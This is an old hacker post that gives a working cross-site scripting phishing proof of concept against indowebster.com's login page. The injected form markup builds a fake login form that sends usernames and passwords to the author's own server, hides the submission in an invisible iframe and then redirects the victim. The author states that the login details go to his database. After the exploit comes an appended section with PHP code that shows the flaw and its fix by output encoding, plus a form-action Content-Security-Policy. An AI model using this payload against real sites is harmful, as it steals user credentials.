Indowebster.com Phishing Vulnerability


  • SPYRO KiD
  • admin[~@t~]syrozone[~d.t~]net
  • Saturday, October 18th, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: indowebster.com XSSED by SPYRO KiD}


POC

<form method="post" action="http://www.indowebster.com/login.php" target="new"><input name="username" id="username" value="&quot; type=&quot;hidden&quot; readonly=&quot;0&quot; style=&quot;position: absolute; left: 0; top: 0; width: 0px; color: #FFFFFF; border-style: solid; border-width: 0; padding: 0; background-color: #FFFFFF&quot; size=&quot;0&quot;&gt;&lt;/form&gt;&lt;form method=&quot;post&quot; action=&quot;http://spyrozone.black-it.net/playground/login.php&quot; target=&quot;kid&quot;&gt;&lt;input name=&quot;username&quot; id=&quot;username&quot; value=&quot;&quot; type=&quot;text&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=&quot;100&quot;&gt;&lt;p&gt;&lt;label for=&quot;password&quot;&gt;Password: &lt;/label&gt;&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;input name=&quot;password&quot; id=&quot;password&quot; type=&quot;password&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; width=&quot;100&quot;&gt;&lt;p&gt;&lt;input name=&quot;go&quot; class=&quot;formbutton&quot; value=&quot;Login&quot; type=&quot;submit&quot; onClick=setTimeout(&quot;window.location='http://www.indowebster.com/login.php';&quot;,7000);&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;a href=&quot;http://www.indowebster.com/register.php&quot;&gt;Belum terdaftar ?&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;  &lt;a href=&quot;http://www.indowebster.com/forgot.php&quot;&gt;Lupa password ?&lt;/a&gt;&lt;/p&gt;&lt;/fieldset&gt;&lt;/form&gt;&lt;iframe name=&quot;kid&quot; width=&quot;0&quot; height=&quot;0&quot; border=&quot;0&quot; frameborder=&quot;0&quot; src=&quot;&quot;&gt;&lt;/iframe&gt;&lt;noscript&gt;" type="hidden">
<input name="password" id="password" type="hidden">
<input name="go" value="Login" src="http://www.spyrozone.net/hacking/storage/2011/10/clickhere.png" type="image">
</form>

Log in with any account you like. REMEMBER! Do not log in with your real account, because the login information will be sent to my database ^_^ . After logging in, see the result at: http://spyrozone.net/playground/indowebster.com-phising.php
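Judging from the payload, the POC depends on login.php writing the posted username back into the value attribute of the login form without HTML-encoding it, so the leading double quote ends the attribute and what follows is parsed as markup. The sketch below is an added example, not code from indowebster.com or from the original post: the function names, the form fragment and the sample input are assumptions, and it shows the unencoded reflection next to the encoded one with a DOM-based regression check.

```php
<?php
// Added example: hypothetical re-rendering of a login field after a failed login.
// Function names and markup are assumptions, not indowebster.com's code.

// Vulnerable pattern: the posted username is copied into the attribute as-is.
function render_username_unsafe(string $username): string
{
    return '<input name="username" id="username" value="' . $username . '" type="text">';
}

// Hardened pattern: encode for an HTML attribute context. ENT_QUOTES covers both
// quote characters; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
function render_username_safe(string $username): string
{
    $encoded = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input name="username" id="username" value="' . $encoded . '" type="text">';
}

// Regression check: parse the fragment inside a login form and count the
// elements of a given tag that the parser actually builds from it.
function count_elements(string $html, string $tag): int
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // injected markup is malformed on purpose
    $doc->loadHTML('<form id="login">' . $html . '</form>');
    libxml_clear_errors();
    return $doc->getElementsByTagName($tag)->length;
}

// Constructed sample input with the same shape as the POC value (quote, tag
// close, new form); other.example is a placeholder host.
$sample = '" type="hidden"></form><form action="https://other.example/collect"><input name="username';

$rendered = [
    'unsafe' => render_username_unsafe($sample),
    'safe'   => render_username_safe($sample),
];

// A correct renderer always yields exactly one form and one input.
foreach ($rendered as $label => $html) {
    printf("%-6s forms=%d inputs=%d\n", $label,
        count_elements($html, 'form'), count_elements($html, 'input'));
}
```

A `Content-Security-Policy` header with `form-action 'self'` on the login page is a useful second layer, because it stops any form in that document from submitting to another origin.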

Stay Alert, keep learning and Happy hacking!


//E.O.F